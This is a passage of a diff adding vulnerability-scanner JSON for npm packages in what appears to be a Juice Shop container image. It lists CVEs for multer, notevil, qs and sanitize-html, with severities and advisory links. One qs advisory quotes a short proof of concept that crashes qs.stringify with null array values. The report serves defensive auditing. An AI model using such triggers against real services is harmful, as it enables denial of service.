"juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48997", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:697f2440851b6eb018194e4e0d55e254ba09735c2eb10ef34bc0035e821fd7c0", + "Title": "multer: Multer vulnerable to Denial of Service via unhandled exception", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-48997", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9", + "https://github.com/expressjs/multer/issues/1233", + "https://github.com/expressjs/multer/pull/1256", + "https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg", + "https://nvd.nist.gov/vuln/detail/CVE-2025-48997", + "https://www.cve.org/CVERecord?id=CVE-2025-48997" + ], + "PublishedDate": "2025-06-03T19:15:39.577Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2025-7338", + "VendorIDs": [ + "GHSA-fjgf-rc76-4x9p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.0.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-7338", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9b163ba88689010be842336a40f4c35dcfe3d9baff5f1bcc53afd3781011b50b", + "Title": "multer: Multer Denial of Service", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.2 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-248" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-7338", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b", + "https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p", + "https://nvd.nist.gov/vuln/detail/CVE-2025-7338", + "https://www.cve.org/CVERecord?id=CVE-2025-7338" + ], + "PublishedDate": "2025-07-17T16:15:35.227Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-2359", + "VendorIDs": [ + "GHSA-v52c-386h-88mc" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2359", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0f8fc13d3e0d5d7240999273aa87e831644404c97cdfb11206bd4e950fab1d18", + "Title": "multer: Multer: Denial of Service via dropped file upload connections", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by dropping connection during file upload, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-772" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2359", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab", + "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2359", + "https://www.cve.org/CVERecord?id=CVE-2026-2359" + ], + "PublishedDate": "2026-02-27T16:16:25.467Z", + "LastModifiedDate": "2026-03-19T17:28:16.05Z" + }, + { + "VulnerabilityID": "CVE-2026-3304", + "VendorIDs": [ + "GHSA-xf7r-hgr6-v32p" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3304", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9a47c7193ada338530523717e82aa21f42d6757ad9c2e8c1bc9d319d4e6cff56", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing resource exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-459" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3304", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee", + "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3304", + "https://www.cve.org/CVERecord?id=CVE-2026-3304" + ], + "PublishedDate": "2026-02-27T16:16:26.38Z", + "LastModifiedDate": "2026-03-19T17:28:33.81Z" + }, + { + "VulnerabilityID": "CVE-2026-3520", + "VendorIDs": [ + "GHSA-5528-5vmv-3xc2" + ], + "PkgID": "multer@1.4.5-lts.2", + "PkgName": "multer", + "PkgPath": "juice-shop/node_modules/multer/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/multer@1.4.5-lts.2", + "UID": "b0c681a9db76ceba" + }, + "InstalledVersion": "1.4.5-lts.2", + "FixedVersion": "2.1.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3520", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0e1ea884e06aed1024834bbc42c19428112cc6ef09ddf62ce0e5a80d881af145", + "Title": "multer: Multer: Denial of Service via malformed requests", + "Description": "Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability in Multer prior to version 2.1.1 allows an attacker to trigger a Denial of Service (DoS) by sending malformed requests, potentially causing stack overflow. Users should upgrade to version 2.1.1 to receive a patch. No known workarounds are available.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3520", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/expressjs/multer", + "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752", + "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3520", + "https://www.cve.org/CVERecord?id=CVE-2026-3520" + ], + "PublishedDate": "2026-03-04T17:16:22.61Z", + "LastModifiedDate": "2026-03-09T18:03:23.1Z" + }, + { + "VulnerabilityID": "CVE-2021-23771", + "VendorIDs": [ + "GHSA-8g4m-cjm2-96wq" + ], + "PkgID": "notevil@1.3.3", + "PkgName": "notevil", + "PkgPath": "juice-shop/node_modules/notevil/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/notevil@1.3.3", + "UID": "349375f6b5c60a6" + }, + "InstalledVersion": "1.3.3", + "Status": "affected", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-23771", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:227e56953efd3cb1867ba0bd2f0d91573f97eae5ba3a5ab74034cb0aacb823c2", + "Title": "Sandbox escape in notevil and argencoders-notevil", + "Description": "This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 6.5 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V2Score": 6.4, + "V3Score": 6.5 + } + }, + "References": [ + "https://github.com/mmckegg/notevil", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23771", + "https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587", + "https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946" + ], + "PublishedDate": "2022-03-17T12:15:07.74Z", + "LastModifiedDate": "2024-11-21T05:51:53.017Z" + }, + { + "VulnerabilityID": "CVE-2026-8723", + "VendorIDs": [ + "GHSA-q8mj-m7cp-5q26" + ], + "PkgID": "qs@6.15.1", + "PkgName": "qs", + "PkgPath": "juice-shop/node_modules/qs/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/qs@6.15.1", + "UID": "bfeeb87c151ea063" + }, + "InstalledVersion": "6.15.1", + "FixedVersion": "6.15.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-8723", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ec99b67e2f0712f086c505fce870c9de9f33c36f7f954e11a4145bea650ec779", + "Title": "### Summary `qs.stringify` throws `TypeError` when called with `arr ...", + "Description": "### Summary\n\n\n\n`qs.stringify` throws `TypeError` when called with `arrayFormat: 'comma'` and `encodeValuesOnly: true` on an array containing `null` or `undefined`. The throw is synchronous and not handled by any of qs's null-related options (`skipNulls`, `strictNullHandling`).\n\n\n\n### Details\n\n\n\nIn the comma + `encodeValuesOnly` branch, `lib/stringify.js:145` mapped the array through the raw encoder before joining:\n\n\n\n```js\n\n\n\nobj = utils.maybeMap(obj, encoder);\n\n\n\n```\n\n\n\n`utils.encode` (`lib/utils.js:195`) reads `str.length` with no null guard, so a `null` or `undefined` element throws `TypeError`. `skipNulls` and `strictNullHandling` are both checked in the per-element loop below this line and never get a chance to run.\n\n\n\nSame class of bug as the filter-array path fixed in 0c180a4. The vulnerable shape of the comma + `encodeValuesOnly` branch was introduced in 4c4b23d (\"encode comma values more consistently\", PR #463, 2023-01-19), first released in v6.11.1.\n\n\n\n#### PoC\n\n\n\n```js\n\n\n\nconst qs = require('qs');\n\n\n\nqs.stringify({ a: [null, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [undefined, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [null] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\n// TypeError: Cannot read properties of null (reading 'length')\n\n\n\n// at encode (lib/utils.js:195:13)\n\n\n\n// at Object.maybeMap (lib/utils.js:322:37)\n\n\n\n// at stringify (lib/stringify.js:145:25)\n\n\n\n```\n\n\n\n#### Fix\n\n\n\n`lib/stringify.js:145`, applied in 21f80b3 on `main` and released as v6.15.2:\n\n\n\n```diff\n\n\n\n- obj = utils.maybeMap(obj, encoder);\n\n\n\n+ obj = utils.maybeMap(obj, function (v) {\n\n\n\n+ return v == null ? v : encoder(v);\n\n\n\n+ });\n\n\n\n```\n\n\n\n`null` and `undefined` now pass through `maybeMap` unchanged and reach the `join(',')` step as-is. For `{ a: [null, 'b'] }` this produces `a=,b`, matching the non-`encodeValuesOnly` comma path (which already joins before encoding and produces `a=%2Cb` for the same input). Single-element `[null]` arrays still collapse via the existing `obj.join(',') || null` and remain subject to `skipNulls` / `strictNullHandling` in the main loop.\n\n\n\n### Affected versions\n\n\n\n`\u003e=6.11.1 \u003c6.15.2` — fixed in v6.15.2.\n\n\n\nThe vulnerable code shape was introduced in 4c4b23d and first shipped in v6.11.1. Earlier versions — including all of 6.7.x, 6.8.x, 6.9.x, 6.10.x, and 6.11.0 — implemented the comma + `encodeValuesOnly` path differently (joining before encoding) and are not affected. Empirically verified across released versions.\n\n\n\n### Impact\n\n\n\nApplication code that calls `qs.stringify` with both `arrayFormat: 'comma'` and `encodeValuesOnly: true` (both non-default) on input that may contain a `null` or `undefined` array element will throw synchronously instead of producing a query string. In a typical Node.js HTTP framework (Express, Fastify, Koa, hapi) the sync throw is caught by the framework's error boundary and the affected request returns a 500; the worker process does not exit and subsequent requests are unaffected. The \"kills the worker process\" framing applies only to call sites outside a request-handler error boundary (background jobs, startup paths, stream pipelines) or to deployments with framework error handling explicitly disabled.\n\n\n\nThe vulnerable input is a `null` or `undefined` entry inside an array; this is reachable from JSON request bodies or from application code constructing arrays from user input, but not from standard HTML form submissions (which produce strings or omitted fields, not literal `null`).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-476" + ], + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "V3Score": 5.3, + "V40Score": 6.3 + } + }, + "References": [ + "https://github.com/ljharb/qs", + "https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41", + "https://github.com/ljharb/qs/security/advisories/GHSA-q8mj-m7cp-5q26", + "https://nvd.nist.gov/vuln/detail/CVE-2026-8723" + ], + "PublishedDate": "2026-05-17T00:16:21.233Z", + "LastModifiedDate": "2026-05-18T20:23:20.24Z" + }, + { + "VulnerabilityID": "CVE-2022-25887", + "VendorIDs": [ + "GHSA-cgfm-xwp7-2cvr" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "2.7.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-25887", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d94b445a10ee90d0e0c9abc1192a9333818c65218d603e1d1a8cd38ec7a643e4", + "Title": "sanitize-html: insecure global regular expression replacement logic may lead to ReDoS", + "Description": "The package sanitize-html before 2.7.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to insecure global regular expression replacement logic of HTML comment removal.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 1, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-25887", + "https://github.com/apostrophecms/sanitize-html/commit/b4682c12fd30e12e82fa2d9b766de91d7d2cd23c", + "https://github.com/apostrophecms/sanitize-html/pull/557", + "https://nvd.nist.gov/vuln/detail/CVE-2022-25887", + "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3008102", + "https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-2957526", + "https://ubuntu.com/security/notices/USN-7464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-25887" + ], + "PublishedDate": "2022-08-30T05:15:07.727Z", + "LastModifiedDate": "2024-11-21T06:53:09.953Z" + }, + { + "VulnerabilityID": "CVE-2016-1000237", + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "\u003e=1.4.3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2016-1000237", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:e31ac1a59638c7e89308e28279d2d4ff2a7fb5ff776fdbb105baebde10f33f2b", + "Title": "XSS - Sanitization not applied recursively", + "Description": "sanitize-html before 1.4.3 has XSS.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2, + "nodejs-security-wg": 2, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V2Score": 4.3, + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/apostrophecms/sanitize-html/commit/762fbc7bba389f3f789cc291c1eb2b64f60f2caf", + "https://github.com/apostrophecms/sanitize-html/issues/29", + "https://github.com/punkave/sanitize-html/issues/29", + "https://nodesecurity.io/advisories/135", + "https://nvd.nist.gov/vuln/detail/CVE-2016-1000237", + "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000237.json", + "https://www.npmjs.com/advisories/135" + ], + "PublishedDate": "2020-01-23T15:15:13.16Z", + "LastModifiedDate": "2024-11-21T02:43:01.763Z" + }, + { + "VulnerabilityID": "CVE-2017-16016", + "VendorIDs": [ + "GHSA-xc6g-ggrc-qq4r" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "1.11.4", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2017-16016", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3ef384d087ecbe89457562e556e32d6ab3f88d2f6b986c303a01da01b5a451bc", + "Title": "Cross-Site Scripting in sanitize-html", + "Description": "Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: If allowed at least one nonTextTags, the result is a potential XSS vulnerability.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V2Score": 4.3, + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/advisories/GHSA-xc6g-ggrc-qq4r", + "https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403", + "https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))", + "https://github.com/punkave/sanitize-html/issues/100", + "https://nodesecurity.io/advisories/154", + "https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16016", + "https://www.npmjs.com/advisories/154" + ], + "PublishedDate": "2018-06-04T19:29:01.023Z", + "LastModifiedDate": "2024-11-21T03:15:40.117Z" + }, + { + "VulnerabilityID": "CVE-2019-25225", + "VendorIDs": [ + "GHSA-qhxp-v273-g94h" + ], + "PkgID": "sanitize-html@1.4.2", + "PkgName": "sanitize-html", + "PkgPath": "juice-shop/node_modules/sanitize-html/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/sanitize-html@1.4.2", + "UID": "940b6e3c5240d67a" + }, + "InstalledVersion": "1.4.2", + "FixedVersion": "2.0.0-beta", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-25225", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6e405981dd6233e61c321747e305a2911c57eaef9ca5b1247dd8e8e824651ec7", + "Title": "sanitize-html: sanitize-html cross site scripting", + "Description": "`sanitize-html` prior to version 2.0.0-beta is vulnerable to Cross-site Scripting (XSS). The `sanitizeHtml()` function in `index.js` does not sanitize content when using the custom `transformTags` option, which is intended to convert attribute values into text. As a result, malicious input can be transformed into executable code.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2019-25225", + "https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2019/CVE-2019-25225", + "https://github.com/apostrophecms/sanitize-html", + "https://github.com/apostrophecms/sanitize-html/commit/712cb6895825c8bb6ede71a16b42bade42abcaf3", + "https://github.com/apostrophecms/sanitize-html/issues/293", + 